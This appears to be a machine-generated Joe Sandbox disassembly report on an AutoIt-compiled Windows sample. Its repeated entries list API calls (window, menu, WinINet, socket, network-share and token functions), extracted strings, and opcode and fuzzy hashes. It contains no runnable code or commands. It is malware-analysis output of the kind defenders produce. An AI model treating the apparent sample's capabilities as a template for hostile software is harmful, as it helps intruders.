                                          • API ID: CurrentOpenProcessThreadToken
                                          • String ID:
                                          • API String ID: 3974789173-0
                                          • Opcode ID: 947003dbb3b393d6b2b10dc5457bc6fa66b94f77915c7fb8d12e8040c33e1964
                                          • Instruction ID: 446bbe48821b63ae83994e01455781830e30cac1f68740aa4dbb18ce2a482994
                                          • Opcode Fuzzy Hash: 947003dbb3b393d6b2b10dc5457bc6fa66b94f77915c7fb8d12e8040c33e1964
                                          • Instruction Fuzzy Hash: 30E04F766423219FD7245FB26E0DB577BA8AF50797F094C28E245EA090DA3484498B62
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E12187
                                          • GetDC.USER32(00000000), ref: 00E12191
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E121B1
                                          • ReleaseDC.USER32(?), ref: 00E121D2
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: c1de8de3446e9b60da24a68a3906e56c99dbaa59ef759bdb4c088709c49da562
                                          • Instruction ID: db693cacc5ac8142d8c7b4253e0a27968056b860bdfaa09175c761b628dc0bf9
                                          • Opcode Fuzzy Hash: c1de8de3446e9b60da24a68a3906e56c99dbaa59ef759bdb4c088709c49da562
                                          • Instruction Fuzzy Hash: 00E0E575900214EFDB059F61C808A9D7BB1EB4C352F10882AF95AA7260DBB881459F90
                                          APIs
                                          • GetDesktopWindow.USER32 ref: 00E1219B
                                          • GetDC.USER32(00000000), ref: 00E121A5
                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00E121B1
                                          • ReleaseDC.USER32(?), ref: 00E121D2
                                          Similarity
                                          • API ID: CapsDesktopDeviceReleaseWindow
                                          • String ID:
                                          • API String ID: 2889604237-0
                                          • Opcode ID: 403d330d11f354d64b9ac04a37dbfa2bae930e9673761c41ad671d67194761d4
                                          • Instruction ID: 80a2a1b0809ea79fb16f6a83f452a545b64052260bfd0b21c16c9cc05460f484
                                          • Opcode Fuzzy Hash: 403d330d11f354d64b9ac04a37dbfa2bae930e9673761c41ad671d67194761d4
                                          • Instruction Fuzzy Hash: C8E0E575800204AFCB059F61C80869D7BA1EB4C312F108825F95AA7260DBB891459F90
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: %
                                          • API String ID: 0-2291192146
                                          • Opcode ID: 0cc855a2bf6c27cb91851a3190b3f0056c780f589ff8279439ef913ed1b51408
                                          • Instruction ID: 73ce8901591d3eeeb6a1b5b5c85c97c3acc0db37a5093763151d3e951e2066ca
                                          • Opcode Fuzzy Hash: 0cc855a2bf6c27cb91851a3190b3f0056c780f589ff8279439ef913ed1b51408
                                          • Instruction Fuzzy Hash: 29B19D719042099ACF24EFA8C8919EEBBB4FF44310F544167E942A7395EB30DE85CBB1
                                          APIs
                                            • Part of subcall function 00DEFEC6: _wcscpy.LIBCMT ref: 00DEFEE9
                                            • Part of subcall function 00DD9997: __itow.LIBCMT ref: 00DD99C2
                                            • Part of subcall function 00DD9997: __swprintf.LIBCMT ref: 00DD9A0C
                                          • __wcsnicmp.LIBCMT ref: 00E3B298
                                          • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00E3B361
                                          Strings
                                          Similarity
                                          • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                          • String ID: LPT
                                          • API String ID: 3222508074-1350329615
                                          • Opcode ID: 4c7e9caee754171b979797141f78dd10b04d7a42fc477eac9abe15386f8bf95b
                                          • Instruction ID: b266261b8f09804f9dda180a172c17a823f67dfa880ee5a7c8faf83f08261137
                                          • Opcode Fuzzy Hash: 4c7e9caee754171b979797141f78dd10b04d7a42fc477eac9abe15386f8bf95b
                                          • Instruction Fuzzy Hash: E1616175A00215AFCB14DF94C895EAEBBF4EF08310F15515AFA46BB351DB70AE44CB60
                                          APIs
                                          • Sleep.KERNEL32(00000000), ref: 00DE2AC8
                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 00DE2AE1
                                          Strings
                                          Similarity
                                          • API ID: GlobalMemorySleepStatus
                                          • String ID: @
                                          • API String ID: 2783356886-2766056989
                                          • Opcode ID: d21a7e4aa374d54bfac83ecd73f88005726265f925f81f469fb7971feb397868
                                          • Instruction ID: 14369bfc1129d6946878c4e554e3270be64a94a851ed0c2337aff69ff0d311a2
                                          • Opcode Fuzzy Hash: d21a7e4aa374d54bfac83ecd73f88005726265f925f81f469fb7971feb397868
                                          • Instruction Fuzzy Hash: 815156724187449BD320AF11DC96BAFBBECFF84310F42885EF1D9512A1DB318969CB26
                                          APIs
                                            • Part of subcall function 00DD506B: __fread_nolock.LIBCMT ref: 00DD5089
                                          • _wcscmp.LIBCMT ref: 00E39AAE
                                          • _wcscmp.LIBCMT ref: 00E39AC1
                                          Strings
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: 4b3763c510cf93a808f4bbd99bad2ceacb81eb53b79d1d50995ca8db9a2024e7
                                          • Instruction ID: 51e0da6fb319e7fde790257fda1e2715afaf97c48395f66d23efed07a4a74cf0
                                          • Opcode Fuzzy Hash: 4b3763c510cf93a808f4bbd99bad2ceacb81eb53b79d1d50995ca8db9a2024e7
                                          • Instruction Fuzzy Hash: F541B371A00609BBDF20AAA0DC46FEFBBB9DF45714F01406AF904B7285DBB59A04C7B1
                                          APIs
                                          • _memset.LIBCMT ref: 00E42892
                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00E428C8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CrackInternet_memset
                                          • String ID: |
                                          • API String ID: 1413715105-2343686810
                                          • Opcode ID: 3cca92de1655cdb082cc961276eb7f823881a0ff9e4cdd04029cf1a69073fe88
                                          • Instruction ID: 7eca20e1a3529956898a40932f453f32be6b743c35d105b15467aacff95ee631
                                          • Opcode Fuzzy Hash: 3cca92de1655cdb082cc961276eb7f823881a0ff9e4cdd04029cf1a69073fe88
                                          • Instruction Fuzzy Hash: 04311A71C01119AFCF11AFA1DC85EEEBFB9FF08340F10406AF915A6265EA315A56DB70
                                          APIs
                                          • DestroyWindow.USER32(?,?,?,?), ref: 00E56D86
                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00E56DC2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$DestroyMove
                                          • String ID: static
                                          • API String ID: 2139405536-2160076837
                                          • Opcode ID: 41034be7a335a8859af4951317acff70bbc1f55fe9ea8bb0ef4633f71f9807d3
                                          • Instruction ID: 7abf9e0e8480e4fa6d15630429c692fb4716fd530aad1d56cba3840c94b65593
                                          • Opcode Fuzzy Hash: 41034be7a335a8859af4951317acff70bbc1f55fe9ea8bb0ef4633f71f9807d3
                                          • Instruction Fuzzy Hash: 12317071210604AEDB109F64CC40AFB77B9FF48725F50A91AFD95A7190DB31AC95CB60
                                          APIs
                                          • _memset.LIBCMT ref: 00E32E00
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00E32E3B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: 58f58bc4e3bb8e7e093c3c210c0dba24b19a4ac24c940952b52333c4b0500c39
                                          • Instruction ID: 89d3236da693d746416a8b346c800bcc59b55939db01164efaebdad82739f711
                                          • Opcode Fuzzy Hash: 58f58bc4e3bb8e7e093c3c210c0dba24b19a4ac24c940952b52333c4b0500c39
                                          • Instruction Fuzzy Hash: 9F31D731600309ABEB268F5AC84A7AEBFF9EF05354F14542EEAC5B61A0D7709944CB50
                                          APIs
                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00E569D0
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E569DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID: Combobox
                                          • API String ID: 3850602802-2096851135
                                          • Opcode ID: 07e26dd3d7ef3fbf22f2017f7926d053e207fbb38848d9f7fe9570a7755e39ba
                                          • Instruction ID: e1d1f2772e7034da87e42857971dcc6ce7b7fa1d3f0195e819561301d199e2d1
                                          • Opcode Fuzzy Hash: 07e26dd3d7ef3fbf22f2017f7926d053e207fbb38848d9f7fe9570a7755e39ba
                                          • Instruction Fuzzy Hash: E711E2712002086FEF119E24CC80EEB37AAEBC93A9F501525FD58AB2A0D6719C5587A0
                                          APIs
                                            • Part of subcall function 00DD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00DD1D73
                                            • Part of subcall function 00DD1D35: GetStockObject.GDI32(00000011), ref: 00DD1D87
                                            • Part of subcall function 00DD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00DD1D91
                                          • GetWindowRect.USER32(00000000,?), ref: 00E56EE0
                                          • GetSysColor.USER32(00000012), ref: 00E56EFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                          • String ID: static
                                          • API String ID: 1983116058-2160076837
                                          • Opcode ID: f96aa7fabc8f12829f9f517ca278600cf0ba33133032f11d4ff9e27a9fe0d250
                                          • Instruction ID: 1ae51a7a42009dba7adbb8235d82e5bd1c6a411ad2f4eb98aa1f4270761f8e8f
                                          • Opcode Fuzzy Hash: f96aa7fabc8f12829f9f517ca278600cf0ba33133032f11d4ff9e27a9fe0d250
                                          • Instruction Fuzzy Hash: AA215972A10209AFDB04DFA8CD45AEA7BB8FB08315F005A29FD55E3250E734E8659B60
                                          APIs
                                          • GetWindowTextLengthW.USER32(00000000), ref: 00E56C11
                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E56C20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: LengthMessageSendTextWindow
                                          • String ID: edit
                                          • API String ID: 2978978980-2167791130
                                          • Opcode ID: 453529adafa6cb58db8dfc7e56559cf04dd5ac44bccef54c4653a615d1b3bdc6
                                          • Instruction ID: c1ec064f46f583550ece492a3cbb86b2e2eb60b39933ca239a36e7b2dfb3723d
                                          • Opcode Fuzzy Hash: 453529adafa6cb58db8dfc7e56559cf04dd5ac44bccef54c4653a615d1b3bdc6
                                          • Instruction Fuzzy Hash: 8C11BF71500208AFEF508E64DC41AEB3769EB0437AF905B25FD60E71E0C771DC989760
                                          APIs
                                          • _memset.LIBCMT ref: 00E32F11
                                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00E32F30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: InfoItemMenu_memset
                                          • String ID: 0
                                          • API String ID: 2223754486-4108050209
                                          • Opcode ID: d62cb5840a4752c932bc04f1b8d19f136c6bab7233925560a3bee03c1eecbcbe
                                          • Instruction ID: 06c1e4fa1cffc2d6748706acbbd16b865cbc707b012afb210b2f099f696bb702
                                          • Opcode Fuzzy Hash: d62cb5840a4752c932bc04f1b8d19f136c6bab7233925560a3bee03c1eecbcbe
                                          • Instruction Fuzzy Hash: 2311E231E01214ABCB35DB59DC49BA97BB9EB01358F0510AAEA84B72A0D7B0EE04C791
                                          APIs
                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00E42520
                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00E42549
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Internet$OpenOption
                                          • String ID: <local>
                                          • API String ID: 942729171-4266983199
                                          • Opcode ID: 668dbf0f53301fac5256c7eb83f9d87360f3c4460dbdcae123c9d5d89910a674
                                          • Instruction ID: a2563fb505a98abc7b12e85fa70723fa17f6903da519675c1189ff2142232e2f
                                          • Opcode Fuzzy Hash: 668dbf0f53301fac5256c7eb83f9d87360f3c4460dbdcae123c9d5d89910a674
                                          • Instruction Fuzzy Hash: 61110270501225BEDB289F62AC98EFBFF68FF06355F50912EFA0567040D2B46984DAF1
                                          APIs
                                            • Part of subcall function 00E4830B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00E480C8,?,00000000,?,?), ref: 00E48322
                                          • inet_addr.WS2_32(00000000), ref: 00E480CB
                                          • htons.WS2_32(00000000), ref: 00E48108
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWidehtonsinet_addr
                                          • String ID: 255.255.255.255
                                          • API String ID: 2496851823-2422070025
                                          • Opcode ID: 6e87c67187a6bba7d59bf6ad006b055ee0f7e3ad2d09ace4feffafa7a8550328
                                          • Instruction ID: 5f37b3aff1e7900bfa6e0e655dfd81a9e68e53b76491696d82c1946bea481cfd
                                          • Opcode Fuzzy Hash: 6e87c67187a6bba7d59bf6ad006b055ee0f7e3ad2d09ace4feffafa7a8550328
                                          • Instruction Fuzzy Hash: 8911CE34200305ABDB20AF64ED46FAEB374EF04320F109527EA11B7391DB72A80587A5
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E29355
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 95ed9a9eea7f8815aeb4271a20c567f57696f59da8cd1d1e0b6cbb0a0923e9a7
                                          • Instruction ID: 372d3c1948f2348f172ba820a10cfe126d221cdc1227af84dc7ccad4709ff7e8
                                          • Opcode Fuzzy Hash: 95ed9a9eea7f8815aeb4271a20c567f57696f59da8cd1d1e0b6cbb0a0923e9a7
                                          • Instruction Fuzzy Hash: 6F019271A05225AB8B05EB64DC91CFE77A9FF06320B142659F832673D2DB3159088770
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E2924D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: a252c35833b03a46e6886a350343b4180fcf2a77654330b950ec7607920c971f
                                          • Instruction ID: 9e45666e0f43b1678757b6296d966c772013d738fc330457f36cced4ba096083
                                          • Opcode Fuzzy Hash: a252c35833b03a46e6886a350343b4180fcf2a77654330b950ec7607920c971f
                                          • Instruction Fuzzy Hash: BB018871A41215BBCB19E7A0E992EFF73ACDF05300F142055B51677292EA116E0C9671
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E292D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: fc4e5a08d2598df24f6b7b2dc1f2cc40cf932899895a33d4ee93fe9bd044e0a5
                                          • Instruction ID: 7d83f8f6c67d7eaec3f5a7836bf9da289c3f5278f83e27961fa0b80653c39376
                                          • Opcode Fuzzy Hash: fc4e5a08d2598df24f6b7b2dc1f2cc40cf932899895a33d4ee93fe9bd044e0a5
                                          • Instruction Fuzzy Hash: 9201A772A41215B7CB15E7A0E982EFF77ACDF11300F242116B81673292DA115E0C9271
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: __calloc_crt
                                          • String ID: @R
                                          • API String ID: 3494438863-2347139750
                                          • Opcode ID: 4f1eb1cf665194c60e35c77da92ec954da8e5dcc9975612c3224533742ed3667
                                          • Instruction ID: f739368f33b3246e25c6245bf6a56cca591b2339195ad019db57e27ef3894f8d
                                          • Opcode Fuzzy Hash: 4f1eb1cf665194c60e35c77da92ec954da8e5dcc9975612c3224533742ed3667
                                          • Instruction Fuzzy Hash: D0F0627230861AEFF724DF2ABD016713795EB40760B168527F304EA6A0EB30C88597B1
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: 17b2acc93ea40498a468a5d10c005c8df3977051f8bf44f8b2818b62385203ab
                                          • Instruction ID: 6cfd321b23496fec8f709fa0871ad0ba267dbedb9491094b9794094ab7257f3d
                                          • Opcode Fuzzy Hash: 17b2acc93ea40498a468a5d10c005c8df3977051f8bf44f8b2818b62385203ab
                                          • Instruction Fuzzy Hash: F5E0D17350432D1BE720A6959C49FA7F7ACEB45771F010167FD14E3150E560994987E1
                                          APIs
                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E281CA
                                            • Part of subcall function 00DF3598: _doexit.LIBCMT ref: 00DF35A2
                                          Strings
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          • Opcode ID: 4703f3a2c283d686059b8526515a1a235f5473ed6d789e6b33546272b9e6a930
                                          • Instruction ID: b44a58e0f096f5e5c9026933840e902b00545efa37888e0ac5284ecbacaef092
                                          • Opcode Fuzzy Hash: 4703f3a2c283d686059b8526515a1a235f5473ed6d789e6b33546272b9e6a930
                                          • Instruction Fuzzy Hash: 6FD05B323C631C36D21532A57D07FDA76488B15B56F054416FB0C755D3CDD1999142F9
                                          APIs
                                            • Part of subcall function 00E0B564: _memset.LIBCMT ref: 00E0B571
                                            • Part of subcall function 00DF0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00E95158,00000000,00E95144,00E0B540,?,?,?,00DD100A), ref: 00DF0B89
